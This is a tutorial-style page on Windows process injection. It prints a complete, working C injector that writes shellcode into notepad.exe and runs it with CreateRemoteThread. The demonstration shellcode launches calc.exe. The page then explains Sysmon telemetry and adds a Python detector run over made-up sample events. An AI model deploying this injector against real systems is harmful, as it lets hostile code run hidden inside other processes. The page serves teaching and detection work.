
# Process Injection --Part 1--

This C program performs **process injection**, specifically **remote code injection** into a running instance of `notepad.exe`. Here's a step-by-step breakdown of what the code does:

## **1 - FindTarget Function (Finds Process ID)**

* The `FindTarget` function takes a process name (`ProcName`) as an argument and searches for a running process with that name.
* It uses `CreateToolhelp32Snapshot` to take a snapshot of all running processes.
* It iterates through the process list using `Process32First`/`Process32Next`, checking whether the process name matches `ProcName` (`notepad.exe` in this case).
* If found, it returns the **process ID (PID)** of the target process.

## **2 - Injection into Notepad**

1. **Open Notepad Process**
   * The `OpenProcess` function is used to get a handle to the `notepad.exe` process with **full access (`PROCESS_ALL_ACCESS`)**.
2. **Allocate Memory in Notepad**
   * `VirtualAllocEx` reserves and commits memory inside `notepad.exe` with `PAGE_EXECUTE_READWRITE` permissions, allowing the shellcode to be both written and executed.
3. **Write the Shellcode into Notepad**
   * `WriteProcessMemory` copies the shellcode (`payload[]`) into the allocated memory space.
4. **Execute the Shellcode in Notepad**
   * `CreateRemoteThread` starts a new thread inside `notepad.exe` at the memory location where the shellcode was written, effectively executing it.

```c
#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>

/* Returns the PID of the first process whose image name matches ProcName,
   0 if no such process is running, or -1 if a Toolhelp call fails. */
int FindTarget(const char *ProcName) {
	HANDLE hSnapShot;
	PROCESSENTRY32 pe32;
	int pid = 0;

	pe32.dwSize = sizeof(PROCESSENTRY32);

	/* The second argument is only used for module/heap snapshots; 0 is correct for TH32CS_SNAPPROCESS. */
	hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hSnapShot) {
		printf("[!] CreateToolhelp32Snapshot failed: %lu\n", GetLastError());
		return -1;
	}

	if (!Process32First(hSnapShot, &pe32)) {
		printf("[!] Process32First failed: %lu\n", GetLastError());
		CloseHandle(hSnapShot);
		return -1;
	}

	/* do/while so that the entry returned by Process32First is compared too. */
	do {
		/* szExeFile is CHAR[] in an ANSI build (UNICODE not defined), matching lstrcmpiA. */
		if (lstrcmpiA(ProcName, pe32.szExeFile) == 0) {
			pid = pe32.th32ProcessID;
			break;
		}
	} while (Process32Next(hSnapShot, &pe32));

	CloseHandle(hSnapShot);
	return pid;
}

int main(void) {

unsigned char payload[] = {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00
};

	HANDLE hProcess;
	HANDLE hThread;
	void *exec_mem;
	int pid;

	pid = FindTarget("notepad.exe");
	if (pid <= 0) {
		printf("[!] notepad.exe is not running\n");
		return 1;
	}

	/* Step 1: open the target. Handle inheritance is not needed, so bInheritHandle is FALSE. */
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
	if (hProcess == NULL) {
		printf("[!] OpenProcess failed: %lu\n", GetLastError());
		return 1;
	}

	/* Step 2: reserve and commit an RWX region in the target large enough for the payload. */
	exec_mem = VirtualAllocEx(hProcess, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (exec_mem == NULL) {
		printf("[!] VirtualAllocEx failed: %lu\n", GetLastError());
		CloseHandle(hProcess);
		return 1;
	}

	/* Step 3: copy the payload into the allocated region. */
	if (!WriteProcessMemory(hProcess, exec_mem, payload, sizeof(payload), NULL)) {
		printf("[!] WriteProcessMemory failed: %lu\n", GetLastError());
		CloseHandle(hProcess);
		return 1;
	}

	/* Step 4: start a thread in the target at the beginning of the region. */
	hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
	if (hThread == NULL) {
		printf("[!] CreateRemoteThread failed: %lu\n", GetLastError());
		CloseHandle(hProcess);
		return 1;
	}

	CloseHandle(hThread);
	CloseHandle(hProcess);
	return 0;
}
```
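The four calls above leave a telemetry trail that defenders key on: `OpenProcess` with thread-creation and memory-write rights shows up as a Sysmon ProcessAccess event (Event ID 10, with the requested rights in `GrantedAccess`), and `CreateRemoteThread` shows up as Event ID 8, which records the thread's start address and whether that address lies inside a loaded module (`StartModule`); `VirtualAllocEx` and `WriteProcessMemory` themselves generate no Sysmon event, so the pair of events is what gets correlated. The Python below is an added example, not part of the original page or its code: it pairs the two event types per source/target process over constructed, simplified Sysmon-style JSON lines (the field names follow Sysmon's, but every event, path, PID and address in the sample is made up), and its 60-second window and two-level severity scoring are the example's own choices.

```python
import json
from datetime import datetime, timedelta

# Win32 PROCESS_* access-right bits. OpenProcess(PROCESS_ALL_ACCESS) grants all of
# them; the VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence
# cannot complete without at least these three.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECTION_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed sample telemetry (not real logs): one JSON object per line in a
# simplified Sysmon-like shape. EventID 10 = ProcessAccess, EventID 8 =
# CreateRemoteThread; field names follow those two event types.
SAMPLE_EVENTS = r"""
{"EventID": 10, "UtcTime": "2024-01-01 12:00:00.000", "SourceImage": "C:\\Users\\lab\\inject.exe", "SourceProcessId": 4120, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2316, "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "UtcTime": "2024-01-01 12:00:01.000", "SourceImage": "C:\\Program Files\\Scanner\\scanner.exe", "SourceProcessId": 900, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2316, "GrantedAccess": "0x410"}
{"EventID": 8, "UtcTime": "2024-01-01 12:00:01.500", "SourceImage": "C:\\Users\\lab\\inject.exe", "SourceProcessId": 4120, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2316, "StartAddress": "0x000001E4B2A40000", "StartModule": "", "StartFunction": ""}
{"EventID": 10, "UtcTime": "2024-01-01 12:00:02.000", "SourceImage": "C:\\Tools\\helper.exe", "SourceProcessId": 5500, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2316, "GrantedAccess": "0x1FFFFF"}
{"EventID": 8, "UtcTime": "2024-01-01 12:00:03.000", "SourceImage": "C:\\Tools\\helper.exe", "SourceProcessId": 5500, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2316, "StartAddress": "0x00007FFB1A2C3D40", "StartModule": "C:\\Windows\\System32\\kernel32.dll", "StartFunction": "LoadLibraryA"}
{"EventID": 10, "UtcTime": "2024-01-01 12:00:05.000", "SourceImage": "C:\\Tools\\monitor.exe", "SourceProcessId": 7777, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2316, "GrantedAccess": "0x1FFFFF"}
{"EventID": 8, "UtcTime": "2024-01-01 12:10:00.000", "SourceImage": "C:\\Tools\\monitor.exe", "SourceProcessId": 7777, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2316, "StartAddress": "0x000001E4B2A50000", "StartModule": "", "StartFunction": ""}
"""


def parse_events(text):
    """Parse JSON lines into event dicts, attach a datetime, and sort by time."""
    events = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["_ts"] = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(ev)
    events.sort(key=lambda e: e["_ts"])
    return events


def grants_injection_rights(granted_access):
    """True if a GrantedAccess mask (hex string as Sysmon logs it) contains all
    three rights needed to allocate, write and start a thread in the target."""
    return int(granted_access, 16) & INJECTION_RIGHTS == INJECTION_RIGHTS


def correlate(events, window=timedelta(seconds=60)):
    """Pair a qualifying ProcessAccess (10) with a later CreateRemoteThread (8)
    from the same source process into the same target process. A remote thread
    whose start address is not backed by a module is flagged on its own."""
    pending = {}  # (source pid, target pid) -> time of the qualifying ProcessAccess
    alerts = []
    for ev in events:
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == 10:
            if grants_injection_rights(ev["GrantedAccess"]):
                pending[key] = ev["_ts"]
            continue
        if ev["EventID"] != 8:
            continue
        reasons = []
        opened = pending.pop(key, None)
        if opened is not None and ev["_ts"] - opened <= window:
            delta = (ev["_ts"] - opened).total_seconds()
            reasons.append("handle with create-thread/vm-write rights opened %.1fs earlier" % delta)
        if not ev.get("StartModule"):
            reasons.append("thread start %s is not backed by a loaded module" % ev["StartAddress"])
        if not reasons:
            continue  # module-backed thread with no recent qualifying access: ignore here
        alerts.append({
            "severity": "high" if len(reasons) == 2 else "medium",
            "source": ev["SourceImage"],
            "target": ev["TargetImage"],
            "target_pid": ev["TargetProcessId"],
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS)):
        print("[%s] %s -> %s (pid %d): %s" % (alert["severity"].upper(), alert["source"],
              alert["target"], alert["target_pid"], "; ".join(alert["reasons"])))
```

On the sample, `inject.exe` scores high (full-access handle followed within two seconds by a thread at an unbacked address, exactly the sequence this page's program produces), `helper.exe` scores medium (same handle rights, but the thread starts in `kernel32!LoadLibraryA`, a pattern shared by DLL injection and some legitimate tooling), `monitor.exe` scores medium on the unbacked start address alone because its access event fell outside the window, and `scanner.exe` produces nothing because `0x410` carries only read/query rights. Note that Sysmon only emits Event ID 10 for accesses matched by a `ProcessAccess` rule in its configuration, so the `GrantedAccess` filter above belongs in that rule as much as in the correlator.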

